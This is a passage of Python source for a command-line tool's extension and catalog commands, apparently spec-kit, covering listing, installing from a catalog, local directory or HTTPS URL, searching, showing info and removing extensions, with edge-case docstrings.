            f"[red]Error:[/red] Extension name '{argument}' is ambiguous. "
            "Multiple installed extensions share this name:"
        )
        table = Table(title="Matching extensions")
        table.add_column("ID", style="cyan", no_wrap=True)
        table.add_column("Name", style="white")
        table.add_column("Version", style="green")
        for ext in name_matches:
            table.add_row(ext.get("id", ""), ext.get("name", ""), str(ext.get("version", "")))
        console.print(table)
        console.print("\nPlease rerun using the extension ID:")
        console.print(f"  [bold]specify extension {command_name} <extension-id>[/bold]")
        raise typer.Exit(1)
    else:
        # No match by ID or display name
        if allow_not_found:
            return (None, None)
        console.print(f"[red]Error:[/red] Extension '{argument}' is not installed")
        raise typer.Exit(1)
def _resolve_catalog_extension(
    argument: str,
    catalog,
    command_name: str = "info",
) -> tuple[Optional[dict], Optional[Exception]]:
    """Resolve a user argument against the catalog; return ``(info, error)``.

    Edge cases:
    - ID lookup is tried first; only then are search results filtered for
      an exact case-insensitive display-name match.
    - An ambiguous display name prints a candidate table (including the
      source catalog) and exits 1; ``typer.Exit`` propagates because only
      ``ExtensionError`` is caught here.
    - A catalog failure (``ExtensionError``) returns ``(None, error)`` so
      callers can distinguish "catalog unreachable" from "not found".
    - Not found anywhere: returns ``(None, None)``.
    """
    from rich.table import Table
    from .extensions import ExtensionError
    try:
        # First try by ID
        ext_info = catalog.get_extension_info(argument)
        if ext_info:
            return (ext_info, None)
        # Try by display name - search using argument as query, then filter for exact match
        search_results = catalog.search(query=argument)
        name_matches = [ext for ext in search_results if ext["name"].lower() == argument.lower()]
        if len(name_matches) == 1:
            return (name_matches[0], None)
        elif len(name_matches) > 1:
            # Ambiguous display-name match in catalog
            console.print(
                f"[red]Error:[/red] Extension name '{argument}' is ambiguous. "
                "Multiple catalog extensions share this name:"
            )
            table = Table(title="Matching extensions")
            table.add_column("ID", style="cyan", no_wrap=True)
            table.add_column("Name", style="white")
            table.add_column("Version", style="green")
            table.add_column("Catalog", style="dim")
            for ext in name_matches:
                table.add_row(
                    ext.get("id", ""),
                    ext.get("name", ""),
                    str(ext.get("version", "")),
                    ext.get("_catalog_name", ""),
                )
            console.print(table)
            console.print("\nPlease rerun using the extension ID:")
            console.print(f"  [bold]specify extension {command_name} <extension-id>[/bold]")
            raise typer.Exit(1)
        # Not found
        return (None, None)
    except ExtensionError as e:
        return (None, e)
@extension_app.command("list")
def extension_list(
    available: bool = typer.Option(False, "--available", help="Show available extensions from catalog"),
    all_extensions: bool = typer.Option(False, "--all", help="Show both installed and available"),
):
    """List installed extensions; optionally hint at catalog discovery.

    Edge cases:
    - Exits 1 outside a spec-kit project (no ``.specify/`` directory).
    - Nothing installed and neither --available nor --all given: prints an
      install hint and returns normally (exit code 0).
    - With --available or --all, this command only prints an install hint;
      the catalog is not actually fetched or listed here.
    - Disabled extensions are still listed, marked with a red ✗ and
      "Disabled" status.
    """
    from .extensions import ExtensionManager
    project_root = Path.cwd()
    # Check if we're in a spec-kit project
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    manager = ExtensionManager(project_root)
    installed = manager.list_installed()
    if not installed and not (available or all_extensions):
        console.print("[yellow]No extensions installed.[/yellow]")
        console.print("\nInstall an extension with:")
        console.print("  specify extension add <extension-name>")
        return
    if installed:
        console.print("\n[bold cyan]Installed Extensions:[/bold cyan]\n")
        for ext in installed:
            status_icon = "✓" if ext["enabled"] else "✗"
            status_color = "green" if ext["enabled"] else "red"
            console.print(f"  [{status_color}]{status_icon}[/{status_color}] [bold]{ext['name']}[/bold] (v{ext['version']})")
            console.print(f"    [dim]{ext['id']}[/dim]")
            console.print(f"    {ext['description']}")
            console.print(f"    Commands: {ext['command_count']} | Hooks: {ext['hook_count']} | Priority: {ext['priority']} | Status: {'Enabled' if ext['enabled'] else 'Disabled'}")
            console.print()
    if available or all_extensions:
        console.print("\nInstall an extension:")
        console.print("  [cyan]specify extension add <name>[/cyan]")
@catalog_app.command("list")
def catalog_list():
    """List active extension catalogs and report the config source in use.

    Edge cases:
    - Exits 1 outside a spec-kit project (no ``.specify/`` directory).
    - Exits 1 if the active catalog stack fails validation
      (``ValidationError`` from ``get_active_catalogs``).
    - The ``SPECKIT_CATALOG_URL`` environment variable takes precedence in
      the config-source report; otherwise the project config is checked
      first, then the user config, then built-in defaults.
    - A config file that exists but fails to load (raises
      ``ValidationError``) is treated the same as a missing one for
      reporting purposes.
    """
    from .extensions import ExtensionCatalog, ValidationError
    project_root = Path.cwd()
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    catalog = ExtensionCatalog(project_root)
    try:
        active_catalogs = catalog.get_active_catalogs()
    except ValidationError as e:
        console.print(f"[red]Error:[/red] {e}")
        raise typer.Exit(1)
    console.print("\n[bold cyan]Active Extension Catalogs:[/bold cyan]\n")
    for entry in active_catalogs:
        install_str = (
            "[green]install allowed[/green]"
            if entry.install_allowed
            else "[yellow]discovery only[/yellow]"
        )
        console.print(f"  [bold]{entry.name}[/bold] (priority {entry.priority})")
        if entry.description:
            console.print(f"    {entry.description}")
        console.print(f"    URL: {entry.url}")
        console.print(f"    Install: {install_str}")
        console.print()
    config_path = project_root / ".specify" / "extension-catalogs.yml"
    user_config_path = Path.home() / ".specify" / "extension-catalogs.yml"
    if os.environ.get("SPECKIT_CATALOG_URL"):
        console.print("[dim]Catalog configured via SPECKIT_CATALOG_URL environment variable.[/dim]")
    else:
        try:
            proj_loaded = config_path.exists() and catalog._load_catalog_config(config_path) is not None
        except ValidationError:
            proj_loaded = False
        if proj_loaded:
            console.print(f"[dim]Config: {config_path.relative_to(project_root)}[/dim]")
        else:
            try:
                user_loaded = user_config_path.exists() and catalog._load_catalog_config(user_config_path) is not None
            except ValidationError:
                user_loaded = False
            if user_loaded:
                console.print("[dim]Config: ~/.specify/extension-catalogs.yml[/dim]")
            else:
                console.print("[dim]Using built-in default catalog stack.[/dim]")
                console.print(
                    "[dim]Add .specify/extension-catalogs.yml to customize.[/dim]"
                )
@catalog_app.command("add")
def catalog_add(
    url: str = typer.Argument(help="Catalog URL (must use HTTPS)"),
    name: str = typer.Option(..., "--name", help="Catalog name"),
    priority: int = typer.Option(10, "--priority", help="Priority (lower = higher priority)"),
    install_allowed: bool = typer.Option(
        False, "--install-allowed/--no-install-allowed",
        help="Allow extensions from this catalog to be installed",
    ),
    description: str = typer.Option("", "--description", help="Description of the catalog"),
):
    """Append an extension catalog entry to .specify/extension-catalogs.yml.

    Edge cases:
    - Exits 1 outside a spec-kit project (no ``.specify/`` directory).
    - Exits 1 if the URL fails catalog-URL validation (HTTPS required).
    - A missing config file starts from an empty config; an existing file
      that cannot be parsed as YAML exits 1 (it is never overwritten).
    - Exits 1 if the config's ``catalogs`` key exists but is not a list.
    - Exits 1 on a duplicate catalog name (case-sensitive match); the user
      is told to remove it first or pick another name.
    - ``install_allowed`` defaults to False, i.e. new catalogs are
      discovery-only unless explicitly enabled.
    """
    from .extensions import ExtensionCatalog, ValidationError
    project_root = Path.cwd()
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    # Validate URL
    tmp_catalog = ExtensionCatalog(project_root)
    try:
        tmp_catalog._validate_catalog_url(url)
    except ValidationError as e:
        console.print(f"[red]Error:[/red] {e}")
        raise typer.Exit(1)
    config_path = specify_dir / "extension-catalogs.yml"
    # Load existing config
    if config_path.exists():
        try:
            config = yaml.safe_load(config_path.read_text()) or {}
        except Exception as e:
            console.print(f"[red]Error:[/red] Failed to read {config_path}: {e}")
            raise typer.Exit(1)
    else:
        config = {}
    catalogs = config.get("catalogs", [])
    if not isinstance(catalogs, list):
        console.print("[red]Error:[/red] Invalid catalog config: 'catalogs' must be a list.")
        raise typer.Exit(1)
    # Check for duplicate name
    for existing in catalogs:
        if isinstance(existing, dict) and existing.get("name") == name:
            console.print(f"[yellow]Warning:[/yellow] A catalog named '{name}' already exists.")
            console.print("Use 'specify extension catalog remove' first, or choose a different name.")
            raise typer.Exit(1)
    catalogs.append({
        "name": name,
        "url": url,
        "priority": priority,
        "install_allowed": install_allowed,
        "description": description,
    })
    config["catalogs"] = catalogs
    config_path.write_text(yaml.dump(config, default_flow_style=False, sort_keys=False))
    install_label = "install allowed" if install_allowed else "discovery only"
    console.print(f"\n[green]✓[/green] Added catalog '[bold]{name}[/bold]' ({install_label})")
    console.print(f"  URL: {url}")
    console.print(f"  Priority: {priority}")
    console.print(f"\nConfig saved to {config_path.relative_to(project_root)}")
@catalog_app.command("remove")
def catalog_remove(
    name: str = typer.Argument(help="Catalog name to remove"),
):
    """Remove a named extension catalog from .specify/extension-catalogs.yml.

    Edge cases:
    - Exits 1 outside a spec-kit project, when no config file exists, when
      the file cannot be parsed, when ``catalogs`` is not a list, or when
      no entry named ``name`` is found.
    - The survivor filter also drops malformed (non-dict) entries as a side
      effect, so the rewritten file is cleaner than the input.
    - Emptying the list is allowed; a note explains built-in defaults then
      apply.

    NOTE(review): because non-dict entries are pruned by the same filter,
    the length comparison can report success (entry "removed") even when no
    entry actually matched ``name`` — confirm this is intended.
    """
    project_root = Path.cwd()
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    config_path = specify_dir / "extension-catalogs.yml"
    if not config_path.exists():
        console.print("[red]Error:[/red] No catalog config found. Nothing to remove.")
        raise typer.Exit(1)
    try:
        config = yaml.safe_load(config_path.read_text()) or {}
    except Exception:
        console.print("[red]Error:[/red] Failed to read catalog config.")
        raise typer.Exit(1)
    catalogs = config.get("catalogs", [])
    if not isinstance(catalogs, list):
        console.print("[red]Error:[/red] Invalid catalog config: 'catalogs' must be a list.")
        raise typer.Exit(1)
    original_count = len(catalogs)
    catalogs = [c for c in catalogs if isinstance(c, dict) and c.get("name") != name]
    if len(catalogs) == original_count:
        console.print(f"[red]Error:[/red] Catalog '{name}' not found.")
        raise typer.Exit(1)
    config["catalogs"] = catalogs
    config_path.write_text(yaml.dump(config, default_flow_style=False, sort_keys=False))
    console.print(f"[green]✓[/green] Removed catalog '{name}'")
    if not catalogs:
        console.print("\n[dim]No catalogs remain in config. Built-in defaults will be used.[/dim]")
@extension_app.command("add")
def extension_add(
    extension: str = typer.Argument(help="Extension name or path"),
    dev: bool = typer.Option(False, "--dev", help="Install from local directory"),
    from_url: Optional[str] = typer.Option(None, "--from", help="Install from custom URL"),
    priority: int = typer.Option(10, "--priority", help="Resolution priority (lower = higher precedence, default 10)"),
):
    """Install an extension from the catalog, a local directory, or a URL.

    Edge cases:
    - Exits 1 outside a spec-kit project; priorities below 1 are rejected.
    - --dev: the directory must exist and contain an ``extension.yml``.
    - --from: HTTPS is required, except plain HTTP to localhost hostnames
      (localhost / 127.0.0.1 / ::1); the downloaded ZIP is deleted in a
      ``finally`` block even when installation fails.
    - Catalog installs: a catalog query failure, a missing extension, and a
      "discovery only" source (``_install_allowed`` false) each exit 1;
      the resolved catalog ID — not the raw argument, which may be a
      display name — is used for the download.
    - The explicit ``typer.Exit`` raises inside the ``try`` are expected to
      propagate past the ``except`` clauses below, which catch only the
      extension-specific error types (assumes none of those subclass
      ``typer.Exit`` — TODO confirm).
    """
    from .extensions import ExtensionManager, ExtensionCatalog, ExtensionError, ValidationError, CompatibilityError
    project_root = Path.cwd()
    # Check if we're in a spec-kit project
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    # Validate priority
    if priority < 1:
        console.print("[red]Error:[/red] Priority must be a positive integer (1 or higher)")
        raise typer.Exit(1)
    manager = ExtensionManager(project_root)
    speckit_version = get_speckit_version()
    try:
        with console.status(f"[cyan]Installing extension: {extension}[/cyan]"):
            if dev:
                # Install from local directory
                source_path = Path(extension).expanduser().resolve()
                if not source_path.exists():
                    console.print(f"[red]Error:[/red] Directory not found: {source_path}")
                    raise typer.Exit(1)
                if not (source_path / "extension.yml").exists():
                    console.print(f"[red]Error:[/red] No extension.yml found in {source_path}")
                    raise typer.Exit(1)
                manifest = manager.install_from_directory(source_path, speckit_version, priority=priority)
            elif from_url:
                # Install from URL (ZIP file)
                import urllib.request
                import urllib.error
                from urllib.parse import urlparse
                # Validate URL
                parsed = urlparse(from_url)
                is_localhost = parsed.hostname in ("localhost", "127.0.0.1", "::1")
                if parsed.scheme != "https" and not (parsed.scheme == "http" and is_localhost):
                    console.print("[red]Error:[/red] URL must use HTTPS for security.")
                    console.print("HTTP is only allowed for localhost URLs.")
                    raise typer.Exit(1)
                # Warn about untrusted sources
                console.print("[yellow]Warning:[/yellow] Installing from external URL.")
                console.print("Only install extensions from sources you trust.\n")
                console.print(f"Downloading from {from_url}...")
                # Download ZIP to temp location
                download_dir = project_root / ".specify" / "extensions" / ".cache" / "downloads"
                download_dir.mkdir(parents=True, exist_ok=True)
                # NOTE(review): the filename embeds the raw `extension` argument;
                # confirm callers cannot pass path separators here (would escape
                # the download dir when joined).
                zip_path = download_dir / f"{extension}-url-download.zip"
                try:
                    with urllib.request.urlopen(from_url, timeout=60) as response:
                        zip_data = response.read()
                    zip_path.write_bytes(zip_data)
                    # Install from downloaded ZIP
                    manifest = manager.install_from_zip(zip_path, speckit_version, priority=priority)
                except urllib.error.URLError as e:
                    console.print(f"[red]Error:[/red] Failed to download from {from_url}: {e}")
                    raise typer.Exit(1)
                finally:
                    # Clean up downloaded ZIP
                    if zip_path.exists():
                        zip_path.unlink()
            else:
                # Install from catalog
                catalog = ExtensionCatalog(project_root)
                # Check if extension exists in catalog (supports both ID and display name)
                ext_info, catalog_error = _resolve_catalog_extension(extension, catalog, "add")
                if catalog_error:
                    console.print(f"[red]Error:[/red] Could not query extension catalog: {catalog_error}")
                    raise typer.Exit(1)
                if not ext_info:
                    console.print(f"[red]Error:[/red] Extension '{extension}' not found in catalog")
                    console.print("\nSearch available extensions:")
                    console.print("  specify extension search")
                    raise typer.Exit(1)
                # Enforce install_allowed policy
                if not ext_info.get("_install_allowed", True):
                    catalog_name = ext_info.get("_catalog_name", "community")
                    console.print(
                        f"[red]Error:[/red] '{extension}' is available in the "
                        f"'{catalog_name}' catalog but installation is not allowed from that catalog."
                    )
                    console.print(
                        f"\nTo enable installation, add '{extension}' to an approved catalog "
                        f"(install_allowed: true) in .specify/extension-catalogs.yml."
                    )
                    raise typer.Exit(1)
                # Download extension ZIP (use resolved ID, not original argument which may be display name)
                extension_id = ext_info['id']
                console.print(f"Downloading {ext_info['name']} v{ext_info.get('version', 'unknown')}...")
                zip_path = catalog.download_extension(extension_id)
                try:
                    # Install from downloaded ZIP
                    manifest = manager.install_from_zip(zip_path, speckit_version, priority=priority)
                finally:
                    # Clean up downloaded ZIP
                    if zip_path.exists():
                        zip_path.unlink()
        console.print("\n[green]✓[/green] Extension installed successfully!")
        console.print(f"\n[bold]{manifest.name}[/bold] (v{manifest.version})")
        console.print(f"  {manifest.description}")
        console.print("\n[bold cyan]Provided commands:[/bold cyan]")
        for cmd in manifest.commands:
            console.print(f"  • {cmd['name']} - {cmd.get('description', '')}")
        console.print("\n[yellow]⚠[/yellow] Configuration may be required")
        console.print(f"  Check: .specify/extensions/{manifest.id}/")
    except ValidationError as e:
        console.print(f"\n[red]Validation Error:[/red] {e}")
        raise typer.Exit(1)
    except CompatibilityError as e:
        console.print(f"\n[red]Compatibility Error:[/red] {e}")
        raise typer.Exit(1)
    except ExtensionError as e:
        console.print(f"\n[red]Error:[/red] {e}")
        raise typer.Exit(1)
@extension_app.command("remove")
def extension_remove(
    extension: str = typer.Argument(help="Extension ID or name to remove"),
    keep_config: bool = typer.Option(False, "--keep-config", help="Don't remove config files"),
    force: bool = typer.Option(False, "--force", help="Skip confirmation"),
):
    """Uninstall an extension, prompting for confirmation unless --force.

    Edge cases:
    - Exits 1 outside a spec-kit project (no ``.specify/`` directory).
    - Accepts an ID or display name; ambiguous names and unknown
      extensions are handled (exit 1) inside ``_resolve_installed_extension``.
    - A missing local manifest is tolerated: the confirmation prompt then
      reports 0 commands to remove.
    - Declining the prompt exits 0 ("Cancelled"); a failed removal from the
      manager exits 1.
    - --keep-config preserves config files in place; otherwise they are
      backed up under ``.specify/extensions/.backup/<id>/``.
    """
    from .extensions import ExtensionManager
    project_root = Path.cwd()
    # Check if we're in a spec-kit project
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    manager = ExtensionManager(project_root)
    # Resolve extension ID from argument (handles ambiguous names)
    installed = manager.list_installed()
    extension_id, display_name = _resolve_installed_extension(extension, installed, "remove")
    # Get extension info for command count
    ext_manifest = manager.get_extension(extension_id)
    cmd_count = len(ext_manifest.commands) if ext_manifest else 0
    # Confirm removal
    if not force:
        console.print("\n[yellow]⚠ This will remove:[/yellow]")
        console.print(f"  • {cmd_count} commands from AI agent")
        console.print(f"  • Extension directory: .specify/extensions/{extension_id}/")
        if not keep_config:
            console.print("  • Config files (will be backed up)")
        console.print()
        confirm = typer.confirm("Continue?")
        if not confirm:
            console.print("Cancelled")
            raise typer.Exit(0)
    # Remove extension
    success = manager.remove(extension_id, keep_config=keep_config)
    if success:
        console.print(f"\n[green]✓[/green] Extension '{display_name}' removed successfully")
        if keep_config:
            console.print(f"\nConfig files preserved in .specify/extensions/{extension_id}/")
        else:
            console.print(f"\nConfig files backed up to .specify/extensions/.backup/{extension_id}/")
        console.print(f"\nTo reinstall: specify extension add {extension_id}")
    else:
        console.print("[red]Error:[/red] Failed to remove extension")
        raise typer.Exit(1)
@extension_app.command("search")
def extension_search(
    query: str = typer.Argument(None, help="Search query (optional)"),
    tag: Optional[str] = typer.Option(None, "--tag", help="Filter by tag"),
    author: Optional[str] = typer.Option(None, "--author", help="Filter by author"),
    verified: bool = typer.Option(False, "--verified", help="Show only verified extensions"),
):
    """Search the extension catalog with optional tag/author/verified filters.

    Edge cases:
    - Exits 1 outside a spec-kit project (no ``.specify/`` directory).
    - No results: refinement tips are printed only when some query or
      filter was actually given; exits 0 either way.
    - Entries from "discovery only" catalogs (``_install_allowed`` false)
      are flagged as not directly installable and get a ZIP-URL install
      suggestion instead of the plain install command.
    - Missing optional fields (downloads, stars, tags, repository) are
      simply omitted from the output.
    - Catalog failures (``ExtensionError``) exit 1 with a retry tip; the
      ``typer.Exit(0)`` raised inside the ``try`` is not an
      ``ExtensionError`` and propagates normally.
    """
    from .extensions import ExtensionCatalog, ExtensionError
    project_root = Path.cwd()
    # Check if we're in a spec-kit project
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    catalog = ExtensionCatalog(project_root)
    try:
        console.print("🔍 Searching extension catalog...")
        results = catalog.search(query=query, tag=tag, author=author, verified_only=verified)
        if not results:
            console.print("\n[yellow]No extensions found matching criteria[/yellow]")
            if query or tag or author or verified:
                console.print("\nTry:")
                console.print("  • Broader search terms")
                console.print("  • Remove filters")
                console.print("  • specify extension search (show all)")
            raise typer.Exit(0)
        console.print(f"\n[green]Found {len(results)} extension(s):[/green]\n")
        for ext in results:
            # Extension header
            verified_badge = " [green]✓ Verified[/green]" if ext.get("verified") else ""
            console.print(f"[bold]{ext['name']}[/bold] (v{ext['version']}){verified_badge}")
            console.print(f"  {ext['description']}")
            # Metadata
            console.print(f"\n  [dim]Author:[/dim] {ext.get('author', 'Unknown')}")
            if ext.get('tags'):
                tags_str = ", ".join(ext['tags'])
                console.print(f"  [dim]Tags:[/dim] {tags_str}")
            # Source catalog
            catalog_name = ext.get("_catalog_name", "")
            install_allowed = ext.get("_install_allowed", True)
            if catalog_name:
                if install_allowed:
                    console.print(f"  [dim]Catalog:[/dim] {catalog_name}")
                else:
                    console.print(f"  [dim]Catalog:[/dim] {catalog_name} [yellow](discovery only — not installable)[/yellow]")
            # Stats
            stats = []
            if ext.get('downloads') is not None:
                stats.append(f"Downloads: {ext['downloads']:,}")
            if ext.get('stars') is not None:
                stats.append(f"Stars: {ext['stars']}")
            if stats:
                console.print(f"  [dim]{' | '.join(stats)}[/dim]")
            # Links
            if ext.get('repository'):
                console.print(f"  [dim]Repository:[/dim] {ext['repository']}")
            # Install command (show warning if not installable)
            if install_allowed:
                console.print(f"\n  [cyan]Install:[/cyan] specify extension add {ext['id']}")
            else:
                console.print(f"\n  [yellow]⚠[/yellow] Not directly installable from '{catalog_name}'.")
                console.print(
                    f"  Add to an approved catalog with install_allowed: true, "
                    f"or install from a ZIP URL: specify extension add {ext['id']} --from <zip-url>"
                )
            console.print()
    except ExtensionError as e:
        console.print(f"\n[red]Error:[/red] {e}")
        console.print("\nTip: The catalog may be temporarily unavailable. Try again later.")
        raise typer.Exit(1)
@extension_app.command("info")
def extension_info(
    extension: str = typer.Argument(help="Extension ID or name"),
):
    """Show details for an extension, preferring catalog info over local.

    Resolution and edge cases:
    - Exits 1 outside a spec-kit project (no ``.specify/`` directory).
    - The argument may be an ID or display name; local resolution uses
      ``allow_not_found=True`` since the extension may be catalog-only.
    - When a display name resolves to a locally installed extension, its
      resolved ID (not the raw argument) is used for the catalog lookup so
      a same-named catalog entry for a *different* extension is not shown.
    - Case 1: found in catalog → full catalog info is printed.
    - Case 2: installed but absent from the catalog, or the catalog is
      unreachable → local manifest info is printed; a non-dict registry
      entry triggers a corruption warning and an "unknown" version, and
      priority falls back to the normalized default.
    - Case 3: not found anywhere → exit 1, with a different hint depending
      on whether the catalog itself failed to respond.
    """
    from .extensions import ExtensionCatalog, ExtensionManager, normalize_priority
    project_root = Path.cwd()
    # Check if we're in a spec-kit project
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    catalog = ExtensionCatalog(project_root)
    manager = ExtensionManager(project_root)
    installed = manager.list_installed()
    # Try to resolve from installed extensions first (by ID or name)
    # Use allow_not_found=True since the extension may be catalog-only
    resolved_installed_id, resolved_installed_name = _resolve_installed_extension(
        extension, installed, "info", allow_not_found=True
    )
    # Try catalog lookup (with error handling)
    # If we resolved an installed extension by display name, use its ID for catalog lookup
    # to ensure we get the correct catalog entry (not a different extension with same name)
    lookup_key = resolved_installed_id if resolved_installed_id else extension
    ext_info, catalog_error = _resolve_catalog_extension(lookup_key, catalog, "info")
    # Case 1: Found in catalog - show full catalog info
    if ext_info:
        _print_extension_info(ext_info, manager)
        return
    # Case 2: Installed locally but catalog lookup failed or not in catalog
    if resolved_installed_id:
        # Get local manifest info
        ext_manifest = manager.get_extension(resolved_installed_id)
        metadata = manager.registry.get(resolved_installed_id)
        metadata_is_dict = isinstance(metadata, dict)
        if not metadata_is_dict:
            console.print(
                "[yellow]Warning:[/yellow] Extension metadata appears to be corrupted; "
                "some information may be unavailable."
            )
        version = metadata.get("version", "unknown") if metadata_is_dict else "unknown"
        console.print(f"\n[bold]{resolved_installed_name}[/bold] (v{version})")
        console.print(f"ID: {resolved_installed_id}")
        console.print()
        if ext_manifest:
            console.print(f"{ext_manifest.description}")
            console.print()
            # Author is optional in extension.yml, safely retrieve it
            author = ext_manifest.data.get("extension", {}).get("author")
            if author:
                console.print(f"[dim]Author:[/dim] {author}")
                console.print()
            if ext_manifest.commands:
                console.print("[bold]Commands:[/bold]")
                for cmd in ext_manifest.commands:
                    console.print(f"  • {cmd['name']}: {cmd.get('description', '')}")
                console.print()
        # Show catalog status
        if catalog_error:
            console.print(f"[yellow]Catalog unavailable:[/yellow] {catalog_error}")
            console.print("[dim]Note: Using locally installed extension; catalog info could not be verified.[/dim]")
        else:
            console.print("[yellow]Note:[/yellow] Not found in catalog (custom/local extension)")
        console.print()
        console.print("[green]✓ Installed[/green]")
        priority = normalize_priority(metadata.get("priority") if metadata_is_dict else None)
        console.print(f"[dim]Priority:[/dim] {priority}")
        console.print(f"\nTo remove: specify extension remove {resolved_installed_id}")
        return
    # Case 3: Not found anywhere
    if catalog_error:
        console.print(f"[red]Error:[/red] Could not query extension catalog: {catalog_error}")
        console.print("\nTry again when online, or use the extension ID directly.")
    else:
        console.print(f"[red]Error:[/red] Extension '{extension}' not found")
        console.print("\nTry: specify extension search")
    raise typer.Exit(1)
def _print_extension_info(ext_info: dict, manager) -> None:
    """Render a detailed info card for an extension found in the catalog.

    Edge cases handled:
    - Optional metadata: ``author`` and ``license`` fall back to "Unknown";
      ``requires``, ``provides``, ``tags``, statistics, and individual link
      entries are printed only when present, so sparse catalog entries still
      render cleanly.
    - ``downloads``/``stars`` are checked with ``is not None`` (not truthiness)
      so a legitimate value of 0 is still displayed.
    - Keys prefixed with ``_`` (``_catalog_name``, ``_install_allowed``) are
      presumably injected by the catalog lookup rather than part of the
      extension manifest itself — TODO confirm against ExtensionCatalog.
    - If the extension is installed but its registry entry is missing or not a
      dict, ``normalize_priority(None)`` supplies a sane default priority
      instead of crashing.
    - If the source catalog disallows installation (``_install_allowed`` is
      False), the install command is replaced with instructions for approving
      the catalog.

    Args:
        ext_info: Catalog entry dict for the extension (see edge cases above
            for which keys are optional).
        manager: ExtensionManager used to query local installation state.
    """
    from .extensions import normalize_priority
    # Header
    verified_badge = " [green]✓ Verified[/green]" if ext_info.get("verified") else ""
    console.print(f"\n[bold]{ext_info['name']}[/bold] (v{ext_info['version']}){verified_badge}")
    console.print(f"ID: {ext_info['id']}")
    console.print()
    # Description
    console.print(f"{ext_info['description']}")
    console.print()
    # Author and License
    console.print(f"[dim]Author:[/dim] {ext_info.get('author', 'Unknown')}")
    console.print(f"[dim]License:[/dim] {ext_info.get('license', 'Unknown')}")
    # Source catalog
    if ext_info.get("_catalog_name"):
        install_allowed = ext_info.get("_install_allowed", True)
        install_note = "" if install_allowed else " [yellow](discovery only)[/yellow]"
        console.print(f"[dim]Source catalog:[/dim] {ext_info['_catalog_name']}{install_note}")
    console.print()
    # Requirements
    if ext_info.get('requires'):
        console.print("[bold]Requirements:[/bold]")
        reqs = ext_info['requires']
        if reqs.get('speckit_version'):
            console.print(f" • Spec Kit: {reqs['speckit_version']}")
        if reqs.get('tools'):
            for tool in reqs['tools']:
                tool_name = tool['name']
                # Tools default to "any" version and "(optional)" when the
                # manifest omits those fields.
                tool_version = tool.get('version', 'any')
                required = " (required)" if tool.get('required') else " (optional)"
                console.print(f" • {tool_name}: {tool_version}{required}")
        console.print()
    # Provides
    if ext_info.get('provides'):
        console.print("[bold]Provides:[/bold]")
        provides = ext_info['provides']
        if provides.get('commands'):
            console.print(f" • Commands: {provides['commands']}")
        if provides.get('hooks'):
            console.print(f" • Hooks: {provides['hooks']}")
        console.print()
    # Tags
    if ext_info.get('tags'):
        tags_str = ", ".join(ext_info['tags'])
        console.print(f"[bold]Tags:[/bold] {tags_str}")
        console.print()
    # Statistics
    stats = []
    # Explicit None checks so 0 downloads / 0 stars are still shown.
    if ext_info.get('downloads') is not None:
        stats.append(f"Downloads: {ext_info['downloads']:,}")
    if ext_info.get('stars') is not None:
        stats.append(f"Stars: {ext_info['stars']}")
    if stats:
        console.print(f"[bold]Statistics:[/bold] {' | '.join(stats)}")
        console.print()
    # Links
    console.print("[bold]Links:[/bold]")
    if ext_info.get('repository'):
        console.print(f" • Repository: {ext_info['repository']}")
    if ext_info.get('homepage'):
        console.print(f" • Homepage: {ext_info['homepage']}")
    if ext_info.get('documentation'):
        console.print(f" • Documentation: {ext_info['documentation']}")
    if ext_info.get('changelog'):
        console.print(f" • Changelog: {ext_info['changelog']}")
    console.print()
    # Installation status and command
    is_installed = manager.registry.is_installed(ext_info['id'])
    install_allowed = ext_info.get("_install_allowed", True)
    if is_installed:
        console.print("[green]✓ Installed[/green]")
        # Registry entry may be corrupted (None / non-dict); normalize_priority
        # tolerates that and yields the default priority.
        metadata = manager.registry.get(ext_info['id'])
        priority = normalize_priority(metadata.get("priority") if isinstance(metadata, dict) else None)
        console.print(f"[dim]Priority:[/dim] {priority}")
        console.print(f"\nTo remove: specify extension remove {ext_info['id']}")
    elif install_allowed:
        console.print("[yellow]Not installed[/yellow]")
        console.print(f"\n[cyan]Install:[/cyan] specify extension add {ext_info['id']}")
    else:
        # Discovery-only catalog: tell the user how to approve it instead of
        # showing an install command that would be refused.
        catalog_name = ext_info.get("_catalog_name", "community")
        console.print("[yellow]Not installed[/yellow]")
        console.print(
            f"\n[yellow]⚠[/yellow] '{ext_info['id']}' is available in the '{catalog_name}' catalog "
            f"but not in your approved catalog. Add it to .specify/extension-catalogs.yml "
            f"with install_allowed: true to enable installation."
        )
@extension_app.command("update")
def extension_update(
    extension: str = typer.Argument(None, help="Extension ID or name to update (or all)"),
):
    """Update one installed extension (or all of them) to the latest catalog version.

    Each update is performed with a backup/rollback scheme so a failed update
    leaves the previous installation intact.

    Edge cases handled:
    - No argument: all installed extensions are checked; exits 0 with a notice
      when nothing is installed or everything is already up to date.
    - Corrupted registry entries (missing/None/non-dict, or missing "version")
      are skipped with a warning rather than aborting the whole run.
    - Unparseable installed or catalog version strings (PEP 440) are skipped
      with a warning.
    - Extensions absent from the catalog, or served by a discovery-only
      catalog (``_install_allowed`` False), are skipped.
    - The downloaded ZIP's ``extension.yml`` may live at the archive root or
